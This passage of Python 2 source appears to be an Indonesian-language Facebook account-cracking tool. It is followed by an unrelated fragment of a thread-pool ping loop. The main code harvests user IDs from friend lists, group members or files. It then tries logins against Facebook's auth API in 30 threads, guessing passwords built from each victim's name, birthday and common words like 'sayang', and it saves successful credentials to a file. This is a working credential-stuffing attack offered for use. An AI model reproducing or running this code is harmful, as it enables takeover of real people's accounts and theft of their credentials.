                               "?access_token=" + toket)
            op = json.loads(jok.text)
            print "\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m " + op[
                "name"]
        except KeyError:
            print "\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
            raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
            super()
        jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
        r = requests.get("https://graph.facebook.com/" + idt +
                         "/friends?access_token=" + toket)
        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])
    elif peak == "3":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        idg = raw_input(
            '\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
        try:
            r = requests.get('https://graph.facebook.com/group/?id=' + idg +
                             '&access_token=' + toket)
            asw = json.loads(r.text)
            print "\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m " + asw[
                'name']
        except KeyError:
            print "\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
            raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
            super()
        jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
        re = requests.get(
            'https://graph.facebook.com/' + idg +
            '/members?fields=name,id&limit=999999999&access_token=' + toket)
        s = json.loads(re.text)
        for p in s['data']:
            id.append(p['id'])
    elif peak == "4":
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        try:
            idlist = raw_input(
                '\x1b[1;96m[+] \x1b[1;93mMasukan nama file  \x1b[1;91m: \x1b[1;97m'
            )
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())
        except IOError:
            print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            super()
    elif peak == "0":
        menu()
    else:
        print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
        pilih_super()

    print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m" + str(
        len(id))
    titik = ['.   ', '..  ', '... ']
    for o in titik:
        print(
            "\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m" +
            o),
        sys.stdout.flush()
        time.sleep(1)
    print
    print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
    print 42 * "\033[1;96m="

    def main(arg):
        global cekpoint, oks
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass
        try:
            a = requests.get('https://graph.facebook.com/' + user +
                             '/?access_token=' + toket)
            b = json.loads(a.text)
            pass1 = b['first_name'] + '123'
            data = urllib.urlopen(
                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
            )
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                    'name']
                print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
                oks.append(user + pass1)
            else:
                if 'www.facebook.com' in q["error_msg"]:
                    print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                    print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                        'name']
                    print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                    print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
                    cek = open("out/super_cp.txt", "a")
                    cek.write("ID:" + user + " Pw:" + pass1 + "\n")
                    cek.close()
                    cekpoint.append(user + pass1)
                else:
                    pass2 = b['first_name'] + '12345'
                    data = urllib.urlopen(
                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                    )
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                        print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                            'name']
                        print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                        print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
                        oks.append(user + pass2)
                    else:
                        if 'www.facebook.com' in q["error_msg"]:
                            print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                            print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                'name']
                            print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                            print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
                            cek = open("out/super_cp.txt", "a")
                            cek.write("ID:" + user + " Pw:" + pass2 + "\n")
                            cek.close()
                            cekpoint.append(user + pass2)
                        else:
                            pass3 = b['last_name'] + '123'
                            data = urllib.urlopen(
                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                            )
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                    'name']
                                print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
                                oks.append(user + pass3)
                            else:
                                if 'www.facebook.com' in q["error_msg"]:
                                    print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                    print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                        'name']
                                    print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                    print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
                                    cek = open("out/super_cp.txt", "a")
                                    cek.write("ID:" + user + " Pw:" + pass3 +
                                              "\n")
                                    cek.close()
                                    cekpoint.append(user + pass3)
                                else:
                                    pass4 = ['sayang'] + '02'
                                    data = urllib.urlopen(
                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                    )
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                        print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                            'name']
                                        print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                        print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
                                        oks.append(user + pass4)
                                    else:
                                        if 'www.facebook.com' in q[
                                                "error_msg"]:
                                            print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                            print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                                'name']
                                            print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                            print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
                                            cek = open("out/super_cp.txt", "a")
                                            cek.write("ID:" + user + " Pw:" +
                                                      pass4 + "\n")
                                            cek.close()
                                            cekpoint.append(user + pass4)
                                        else:
                                            birthday = b['birthday']
                                            pass5 = birthday.replace('/', '')
                                            data = urllib.urlopen(
                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                + (user) +
                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                            )
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                                print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                                    'name']
                                                print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                                print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
                                                oks.append(user + pass5)
                                            else:
                                                if 'www.facebook.com' in q[
                                                        "error_msg"]:
                                                    print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                                    print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                                        'name']
                                                    print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                                    print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
                                                    cek = open(
                                                        "out/super_cp.txt",
                                                        "a")
                                                    cek.write("ID:" + user +
                                                              " Pw:" + pass5 +
                                                              "\n")
                                                    cek.close()
                                                    cekpoint.append(user +
                                                                    pass5)
                                                else:
                                                    pass6 = 'Sayang'
                                                    data = urllib.urlopen(
                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                        + (user) +
                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                    )
                                                    q = json.load(data)
                                                    if 'access_token' in q:
                                                        print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
                                                        print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;92m' + b[
                                                            'name']
                                                        print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;92m' + user
                                                        print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
                                                        oks.append(user +
                                                                   pass6)
                                                    else:
                                                        if 'www.facebook.com' in q[
                                                                "error_msg"]:
                                                            print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
                                                            print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m    : \x1b[1;93m' + b[
                                                                'name']
                                                            print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m      : \x1b[1;93m' + user
                                                            print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
                                                            cek = open(
                                                                "out/super_cp.txt",
                                                                "a")
                                                            cek.write("ID:" +
                                                                      user +
                                                                      " Pw:" +
                                                                      pass6 +
                                                                      "\n")
                                                            cek.close()
                                                            cekpoint.append(
                                                                user + pass6)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
    print "\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m" + str(
        len(oks)) + "\033[1;97m/\033[1;93m" + str(len(cekpoint))
    print(
        "\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt"
    )
    raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
    super()
Exemple #54
0
 def run(self):
     if not self.items: return
     pool = ThreadPool(len(self.items))
     while not self.stopEvent.isSet():
         pool.map(self.pingItem, self.items.values())
         self.stopEvent.wait(self.config.get('refresh'))